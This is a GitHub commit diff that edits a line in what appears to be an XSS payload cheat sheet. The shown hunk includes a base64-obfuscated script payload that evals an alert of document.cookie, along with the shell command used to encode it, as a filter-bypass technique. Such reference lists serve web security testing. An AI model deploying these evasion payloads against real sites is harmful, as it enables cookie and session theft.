Update README.md

This commit is contained in:
idealphase 2021-11-10 22:40:40 +07:00 committed by GitHub
parent 6c7df7dc4e
commit e9eac5ca59
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -667,7 +667,7 @@ http://www.geektools.com/cgi-bin/ipconv.cgi
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
```
Base64 encoding your XSS payload with linux command: echo -n "alert(document.cookie)" | base64
Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
### Bypass parenthesis for string